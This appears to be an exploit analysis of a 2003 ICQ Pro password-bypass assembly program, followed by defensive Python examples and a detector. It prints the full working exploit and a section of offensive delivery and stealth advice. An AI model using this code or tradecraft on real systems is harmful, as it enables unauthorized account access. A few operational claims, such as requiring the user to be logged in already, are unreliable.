ICQ Pro 2003a Password Bypass Exploit Analysis
What this paper is
This paper presents an assembly exploit for ICQ Pro 2003a that bypasses the client's password authentication. The exploit manipulates ICQ's window handles to get past the login screen, so a user can log in to the ICQ server with any account registered locally on the machine without knowing its password. The vulnerability is present in ICQ Pro 2003a Build #3800.
Simple technical breakdown
The exploit operates by finding specific windows related to the ICQ login process. It then manipulates these windows to effectively bypass the password prompt. The core idea is to interact with the ICQ application's user interface elements through Windows API calls, tricking it into thinking the login process has been completed successfully without actual password verification.
The exploit identifies two possible window titles: "Password Verification" and "Login to server". It then finds the parent window of the login dialog and enables it. Finally, it hides the login window and exits the exploit process, leaving ICQ logged in.
Complete code and payload walkthrough
The provided code is an assembly program written for MASM32. It uses Windows API functions to interact with the ICQ application.
; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
; CUT HERE - CUTE HERE - ca1-icq.asm - CUT HERE - CUT HERE BOF
; -------------------------------------------------------------------------
;
; 07/02/2003 - ca1-icq.asm
; ICQ Password Bypass exploit.
; written by Caua Moura Prado (aka ca1)
;
; This exploit allows you to login to ICQ server using any account registered *locally*
; no matter the 'save password' option is checked or not. High level security is also bypassed.
; All you have to do is run the exploit and set status property using your mouse when the flower
; is yellow. If you accidentally set status to offline then you will need to restart ICQ and run
; the exploit again.
;
; uh-oh!
; ___
; __/ \__
; / \___/ \ Vulnerable:
; \__/+ +\__/ ICQ Pro 2003a Build #3800
; / ~~~ \
; \__/ \__/ Not Vulnerable:
; \___/ ICQ Lite alpha Build 1211
; ICQ 2001b and ICQ 2002a
; tHe Flaw Power All other versions were not tested.
;
; coded with masm32
; ________________________________________________________________exploit born in .br
.386
.model flat, stdcall
option casemap:none
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
.data
szTextHigh byte 'Password Verification', 0
szTextLow byte 'Login to server', 0
szClassName byte '#32770', 0
.data?
hWndLogin dword ?
.code
_entrypoint:
invoke FindWindow, addr szClassName, addr szTextHigh
mov hWndLogin, eax
.if hWndLogin == 0
invoke FindWindow, addr szClassName, addr szTextLow
mov hWndLogin, eax
.endif
invoke GetParent, hWndLogin
invoke EnableWindow, eax, 1      ; Enable ICQ contact list
invoke ShowWindow, hWndLogin, 0  ; get rid of Login screen (don't kill this window)
invoke ExitProcess, 0            ; uhuu.. cya! i gotta sleep!
end _entrypoint
; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
; CUT HERE - CUTE HERE - ca1-icq.asm - CUT HERE - CUT HERE EOF
; -------------------------------------------------------------------------
; milw0rm.com [2003-07-09]
Code Breakdown:
- .386, .model flat, stdcall, option casemap:none: assembler directives. .386 selects the Intel 80386 instruction set. .model flat, stdcall defines the memory model and calling convention: flat means a single 4 GB address space, and stdcall is the calling convention used by Windows API functions. option casemap:none makes identifiers case-sensitive.
- include \masm32\include\user32.inc, include \masm32\include\kernel32.inc: include the header files that declare the structures, constants, and function prototypes for the Windows User32 and Kernel32 libraries.
- includelib \masm32\lib\user32.lib, includelib \masm32\lib\kernel32.lib: link against the import libraries for User32 and Kernel32 so the program can call functions from those DLLs.
- .data section:
  - szTextHigh byte 'Password Verification', 0: null-terminated string holding the window title "Password Verification".
  - szTextLow byte 'Login to server', 0: null-terminated string holding the window title "Login to server".
  - szClassName byte '#32770', 0: null-terminated string holding the window class name '#32770', the class Windows uses for standard dialog boxes.
- .data? section:
  - hWndLogin dword ?: declares an uninitialized 32-bit (dword) variable that will hold a window handle; the ? means no initial value.
- .code section:
  - _entrypoint:: label marking the program's entry point.
  - invoke FindWindow, addr szClassName, addr szTextHigh: first attempt to locate the ICQ login window. FindWindow is a Windows API function that searches for a top-level window with the given class name (#32770) and window title (Password Verification). The handle of the matching window is returned in EAX; if no window matches, EAX is 0.
  - mov hWndLogin, eax: stores the result of the FindWindow call in hWndLogin.
  - .if hWndLogin == 0: checks whether the first FindWindow call failed. If the "Password Verification" window was not found, the block that follows executes.
  - invoke FindWindow, addr szClassName, addr szTextLow: second attempt, with the same class name (#32770) and the alternative title (Login to server). Again the handle, or 0, is returned in EAX.
  - mov hWndLogin, eax: stores the result of the second FindWindow call in hWndLogin.
  - .endif: ends the conditional block.
  - invoke GetParent, hWndLogin: retrieves the parent window of the login dialog; its handle is returned in EAX. Manipulating the parent is what lets the rest of the application become usable.
  - invoke EnableWindow, eax, 1: enables the parent window (the handle GetParent just returned; 1 is TRUE). The source comment calls this "Enable ICQ contact list": a modal dialog leaves its owner window disabled, and this call makes the main ICQ window interactive again.
  - invoke ShowWindow, hWndLogin, 0: hides the login dialog. The show command 0 is SW_HIDE, which hides the window and deactivates it. The source comment says "get rid of Login screen (don't kill this window)".
  - invoke ExitProcess, 0: terminates the exploit process with exit code 0 (success). The comment jokes "uhuu.. cya! i gotta sleep!".
  - end _entrypoint: marks the end of the source and names the entry point.
Payload/Shellcode Explanation:
There is no distinct shellcode or payload in the traditional sense (like code injected into another process or executed remotely). The provided assembly code is the exploit. It's a standalone executable that, when run, interacts with the ICQ application's running instance on the local machine.
Mapping:
- FindWindow, addr szClassName, addr szTextHigh -> locate the primary login dialog window.
- FindWindow, addr szClassName, addr szTextLow -> locate the alternative login dialog window if the first lookup fails.
- GetParent, hWndLogin -> obtain the handle of the main ICQ window, or whichever window controls the login state.
- EnableWindow, eax, 1 -> make the main ICQ interface active and responsive again, so the bypass takes effect.
- ShowWindow, hWndLogin, 0 -> hide the login dialog, removing the user's interaction with it.
- ExitProcess, 0 -> terminate the exploit program after performing its actions.
Practical details for offensive operations teams
- Required Access Level: Local Administrator privileges are generally not required. The exploit targets a running instance of ICQ Pro 2003a and interacts with its windows; standard user privileges sufficient to run applications and interact with the GUI should be enough.
- Lab Preconditions:
  - A target machine with ICQ Pro 2003a Build #3800 installed and running.
  - The target user must be logged into the ICQ client.
  - The exploit must be executed on the same machine where ICQ is running.
  - The exploit expects the ICQ login dialog to be present or triggerable.
- Tooling Assumptions:
  - Assembler: MASM32 is required to assemble the .asm source into an executable.
  - Linker: the MASM32 toolchain (ml.exe and link.exe) is used.
  - Execution Environment: a Windows environment (likely Windows XP or similar, given the exploit's age) where ICQ Pro 2003a can run.
- Execution Pitfalls:
  - ICQ Version Mismatch: the exploit is specific to ICQ Pro 2003a Build #3800; other versions will likely not be vulnerable.
  - ICQ Not Running: if ICQ is not running, FindWindow fails and the exploit will likely exit without effect.
  - Login Dialog Not Present: if the user has already logged in and the login dialog is not displayed, the exploit might not find the target windows.
  - Window Titles Changed: if the user or application has modified the default window titles, the FindWindow calls fail.
  - Race Conditions: while not explicitly detailed, there is potential for a race if ICQ is in the process of opening or closing windows when the exploit runs.
  - Antivirus/Endpoint Detection: modern AV solutions might flag the FindWindow, ShowWindow, and ExitProcess API calls, especially if the executable is unsigned or already known.
  - User Interaction Required (Implied): the original paper says to "set status property using your mouse when the flower is yellow". After running the exploit, the user still has to perform that action in ICQ for the bypass to take full effect and for the connection to be established. This is a crucial detail for operational planning.
- Tradecraft Considerations:
  - Delivery: the .asm file must be assembled into an .exe, which then has to be delivered to the target machine and executed.
  - Stealth: the exploit is a short-lived process that terminates after execution; its primary impact is on the ICQ application, and running the .exe is the main detectable event.
  - Persistence: the exploit provides no persistence; it is a one-shot action.
  - Post-Exploitation: once the bypass succeeds, the attacker can log into ICQ as the target user without a password, allowing eavesdropping on conversations, sending messages, or accessing contact lists.
Where this was used and when
- Context: This exploit targets a specific vulnerability in ICQ Pro 2003a. It was likely used by individuals or groups interested in unauthorized access to ICQ accounts for purposes such as espionage, social engineering, or simply to gain access to a user's contact list and communications.
- Timeframe: The exploit was published on July 9, 2003. Therefore, its usage would have been primarily in the early to mid-2000s, coinciding with the popularity of ICQ as a messaging platform. It's unlikely to be relevant against modern ICQ versions or other contemporary messaging applications due to significant changes in security and application architecture.
Defensive lessons for modern teams
- Vulnerability Specificity: Exploits are often highly specific to application versions and build numbers. Keeping software updated is paramount.
- Window Management Vulnerabilities: Applications that rely on manipulating window handles and properties for authentication can be susceptible to UI-level bypasses. Robust authentication should not depend on the visibility or state of UI elements.
- Input Validation: While this exploit bypasses password authentication, it highlights the importance of validating all inputs and states within an application.
- Principle of Least Privilege: Running applications with elevated privileges can increase the impact of vulnerabilities.
- Endpoint Detection and Response (EDR): Modern EDR solutions can detect the suspicious API calls (FindWindow, ShowWindow, EnableWindow, ExitProcess) made by such exploits, especially when combined with behavioral analysis.
- Application Sandboxing/Isolation: Running applications in sandboxed environments can limit their ability to interact with other processes or the operating system in unexpected ways.
- Code Signing: Unsigned executables or executables from untrusted sources should be treated with extreme caution.
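The "Window Management Vulnerabilities" lesson above in runnable form. This is an added Python example written for this page; it is not ICQ's code and is not taken from the original paper. The FakeServer, Window, UiGatedClient and SessionGatedClient classes and the credentials "alice" / "correct horse" are constructed assumptions. It models the flaw as a client that considers itself logged in once its login dialog is hidden and its main window is enabled, then applies the same external change that EnableWindow/ShowWindow perform from another process and shows that this unlocks the UI-gated client but not one that checks a server-issued session token.

```python
"""Vulnerable vs. hardened authentication-state models (added example)."""
import hashlib
import hmac
import secrets


class Window:
    """Minimal stand-in for a Win32 window's visible/enabled state."""

    def __init__(self, title, visible=True, enabled=True):
        self.title = title
        self.visible = visible
        self.enabled = enabled


class FakeServer:
    """Constructed credential store and session issuer (the server side)."""

    def __init__(self):
        self._salt = b"constructed-salt"          # constructed, not a real value
        self._users = {"alice": self._digest("correct horse")}
        self._sessions = set()

    def _digest(self, password):
        return hashlib.sha256(self._salt + password.encode()).digest()

    def login(self, user, password):
        """Return a fresh session token on a correct password, else None."""
        stored = self._users.get(user)
        if stored is None or not hmac.compare_digest(stored, self._digest(password)):
            return None
        token = secrets.token_hex(16)
        self._sessions.add(token)
        return token

    def is_valid(self, token):
        return token in self._sessions


class UiGatedClient:
    """Vulnerable pattern: 'logged in' is inferred from window state only.
    The server result merely drives the flags; nothing re-checks it later."""

    def __init__(self, server):
        self.server = server
        self.login_dialog = Window("Login to server")
        self.main_window = Window("ICQ", enabled=False)  # disabled behind the modal dialog

    def submit_login(self, user, password):
        if self.server.login(user, password) is not None:
            self.login_dialog.visible = False
            self.main_window.enabled = True

    def is_logged_in(self):
        return self.main_window.enabled and not self.login_dialog.visible


class SessionGatedClient(UiGatedClient):
    """Hardened pattern: same UI, but authorization comes from a session token
    that only a successful server login can produce."""

    def __init__(self, server):
        super().__init__(server)
        self.session = None

    def submit_login(self, user, password):
        self.session = self.server.login(user, password)
        if self.session is not None:
            self.login_dialog.visible = False
            self.main_window.enabled = True

    def is_logged_in(self):
        return self.session is not None and self.server.is_valid(self.session)


def tamper_from_outside(client):
    """Effect of EnableWindow(parent, TRUE) + ShowWindow(dialog, SW_HIDE) issued by
    another process: the window flags change, but no server session is created."""
    client.main_window.enabled = True
    client.login_dialog.visible = False


def send_message(client, text):
    """A privileged action that must only succeed for an authenticated client."""
    if not client.is_logged_in():
        raise PermissionError("not authenticated")
    return "sent: " + text


def run_demo():
    """Return whether tampering alone yields an authenticated state in each model,
    plus a check that the hardened client still works for a genuine login."""
    server = FakeServer()
    results = {}
    for name, cls in (("ui_gated", UiGatedClient), ("session_gated", SessionGatedClient)):
        client = cls(server)
        tamper_from_outside(client)        # no password is ever submitted
        results[name] = client.is_logged_in()
    good = SessionGatedClient(server)
    good.submit_login("alice", "correct horse")
    results["session_gated_real_login"] = good.is_logged_in()
    return results


if __name__ == "__main__":
    print(run_demo())  # {'ui_gated': True, 'session_gated': False, 'session_gated_real_login': True}
```

The point of the design is that the window flags are shared state any process on the desktop can reach, while the session token lives in the client's memory and is validated by the server; hiding a dialog or enabling a window changes nothing the hardened client relies on.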
ASCII visual (if applicable)
The exploit does its work through window handles and window state, manipulated with User32 API calls. A visual representation of the process flow would be:

+------------------------------------------------+
| Exploit executable (same machine as ICQ)       |
+------------------------------------------------+
                        |
                        v
+------------------------------------------------+
| FindWindow("#32770", "Password Verification")  |
|   or FindWindow("#32770", "Login to server")   |
+------------------------------------------------+
                        | hWndLogin (0 if not found)
                        v
+------------------------------------------------+
| GetParent(hWndLogin)                           |
+------------------------------------------------+
                        | parent handle in EAX
                        v
+------------------------------------------------+
| EnableWindow(parent, TRUE)                     |
+------------------------------------------------+
                        |
                        v
+------------------------------------------------+
| ShowWindow(hWndLogin, SW_HIDE)                 |
+------------------------------------------------+
                        |
                        v
+------------------------------------------------+
| ExitProcess(0)                                 |
+------------------------------------------------+

This diagram illustrates the sequential API calls made by the exploit to locate, manipulate, and then hide the ICQ login window, ultimately allowing the application to proceed without proper authentication.
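The call sequence in the diagram is also what a defender can look for. The following is an added Python example, not part of the original write-up and not the output or logic of any real EDR product: it parses a constructed API-call trace in an assumed key=value format (owner_pid is assumed to be the process that owns the window being touched, as an EDR could record via GetWindowThreadProcessId) and flags a process that locates another process's #32770 dialog by a credential-related title and then enables its parent or hides it. The process name unknown.exe and all handles are constructed values.

```python
"""Detect cross-process hide/enable of an authentication dialog (added example)."""
import re
import shlex
from collections import defaultdict

DIALOG_CLASS = "#32770"                      # class of standard Windows dialog boxes
AUTH_TITLE_RE = re.compile(r"password|login|verif|sign.?in", re.IGNORECASE)
SW_HIDE = 0

# Constructed sample trace (not real EDR output): one API call per line.
# The notepad.exe lines are a benign control case: a process hiding its own window.
SAMPLE_TRACE = """\
pid=100 proc=notepad.exe api=FindWindow class=Notepad title="Untitled - Notepad" ret=0x00030A1C owner_pid=100
pid=100 proc=notepad.exe api=ShowWindow hwnd=0x00030A1C cmd=0 owner_pid=100
pid=4321 proc=unknown.exe api=FindWindow class=#32770 title="Password Verification" ret=0x0 owner_pid=0
pid=4321 proc=unknown.exe api=FindWindow class=#32770 title="Login to server" ret=0x000A0B3C owner_pid=2200
pid=4321 proc=unknown.exe api=GetParent hwnd=0x000A0B3C ret=0x000A0A10 owner_pid=2200
pid=4321 proc=unknown.exe api=EnableWindow hwnd=0x000A0A10 enable=1 owner_pid=2200
pid=4321 proc=unknown.exe api=ShowWindow hwnd=0x000A0B3C cmd=0 owner_pid=2200
pid=4321 proc=unknown.exe api=ExitProcess code=0
"""


def parse_line(line):
    """Split one 'key=value key="quoted value"' record into a dict."""
    fields = {}
    for token in shlex.split(line):
        key, _, value = token.partition("=")
        fields[key] = value
    return fields


def detect(trace):
    """Return one alert per call in which a process enabled or hid a window owned
    by another process, after locating an authentication dialog by title."""
    located = defaultdict(dict)   # caller pid -> {hwnd: description}
    alerts = []
    for raw in trace.splitlines():
        if not raw.strip():
            continue
        f = parse_line(raw)
        pid, api = f["pid"], f["api"]
        if api == "FindWindow":
            found = int(f["ret"], 16) != 0
            if found and f.get("class") == DIALOG_CLASS and AUTH_TITLE_RE.search(f.get("title", "")):
                located[pid][f["ret"]] = f["title"]
        elif api == "GetParent" and f.get("hwnd") in located[pid]:
            # The parent of a located dialog is tracked too, since the exploit enables it.
            located[pid][f["ret"]] = "parent of " + located[pid][f["hwnd"]]
        elif api in ("ShowWindow", "EnableWindow") and f.get("hwnd") in located[pid]:
            cross_process = f.get("owner_pid") != pid
            hides = api == "ShowWindow" and int(f.get("cmd", "-1")) == SW_HIDE
            if cross_process and (hides or api == "EnableWindow"):
                alerts.append({"pid": pid, "proc": f.get("proc"), "api": api,
                               "hwnd": f["hwnd"], "window": located[pid][f["hwnd"]]})
    return alerts


def suspicious_pids(trace):
    """Sorted list of caller pids that produced at least one alert."""
    return sorted({alert["pid"] for alert in detect(trace)})


if __name__ == "__main__":
    for alert in detect(SAMPLE_TRACE):
        print(alert)
```

The rule keys on the combination rather than on any single call: FindWindow, ShowWindow and EnableWindow are used constantly by legitimate software on their own windows, so the benign notepad.exe lines produce nothing, while a foreign process that finds a dialog-class window with a credential-related title and then changes its enabled/visible state produces an alert for each such call.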
Source references
- Paper ID: 52
- Paper Title: ICQ Pro 2003a - 'ca1-icq.asm' Password Bypass
- Author: Caua Moura Prado
- Published: 2003-07-09
- Keywords: Windows, local
- Paper URL: https://www.exploit-db.com/papers/52
- Raw URL: https://www.exploit-db.com/raw/52